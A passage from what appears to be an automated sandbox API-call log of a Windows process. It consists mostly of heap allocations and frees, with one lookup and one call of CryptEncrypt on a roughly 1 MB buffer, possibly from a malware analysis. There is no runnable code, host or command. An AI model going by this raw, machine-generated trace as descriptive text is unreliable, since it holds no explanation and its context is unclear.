hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0172.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0172.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0172.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0172.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0172.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0172.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0172.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0172.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0172.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0172.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0172.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0172.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0172.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0172.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0172.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0172.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0172.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0172.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0172.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0172.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0172.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0172.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0172.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0172.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0172.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0172.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0172.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0172.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c00) returned 0x40e2020 [0172.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0172.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x40e2020 | out: hHeap=0x970000) returned 1 [0172.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0172.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0172.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0172.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0172.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0172.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0172.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0172.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0172.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0172.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0172.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0172.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0172.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0172.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0172.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0172.284] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0172.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0172.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0172.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0172.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0172.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0172.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0172.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0172.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0172.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0172.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0172.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0172.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0172.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0172.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0172.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0172.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0172.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0172.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0172.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0172.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0172.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0172.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0172.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0172.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0172.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0172.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0172.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0172.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0172.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0172.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0172.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0172.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0172.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0172.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0172.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0172.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0172.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0172.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0172.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0172.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0172.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0172.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0172.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0172.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0172.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0172.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0172.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0172.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0172.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0172.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0172.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0172.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0172.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0172.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0172.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0172.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0172.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0172.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0172.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0172.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0172.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0172.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0172.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0172.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0172.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0172.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0172.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0172.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0172.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0172.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0172.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0172.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0172.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0172.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0172.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0172.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0172.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50b18 [0172.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0172.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0172.287] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0172.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0172.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0172.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54080 [0172.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0172.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0172.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0172.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0172.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0172.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0172.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0172.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0172.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0172.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0172.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0172.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0172.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0172.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0172.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0172.288] CryptEncrypt (in: hKey=0xa87090, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xf0c00, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xf0c08) returned 1 [0172.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0172.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0172.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0172.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0172.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0172.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0172.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0172.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0172.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0172.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0172.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0172.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0172.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0172.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0172.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0172.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0172.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0172.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0172.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0172.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0172.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0172.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0172.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0172.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0172.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0172.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0172.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0172.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0172.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0172.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0172.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0172.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0172.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0172.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0172.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0172.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0172.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0172.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0172.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0172.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0172.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0172.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0172.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0172.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0172.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0172.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0172.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0172.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0172.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0172.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0172.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0172.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0172.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0172.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0172.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0172.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0172.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0172.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0172.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0172.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0172.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0172.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0172.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0172.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0172.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0172.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0172.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0172.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0172.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0172.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0172.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0172.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0172.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0172.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0172.292] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0172.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0172.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0172.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0172.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0172.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0172.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0172.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0172.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0172.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0172.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0172.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0172.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0172.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0172.329] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0172.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0172.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0172.329] HeapFree (in: 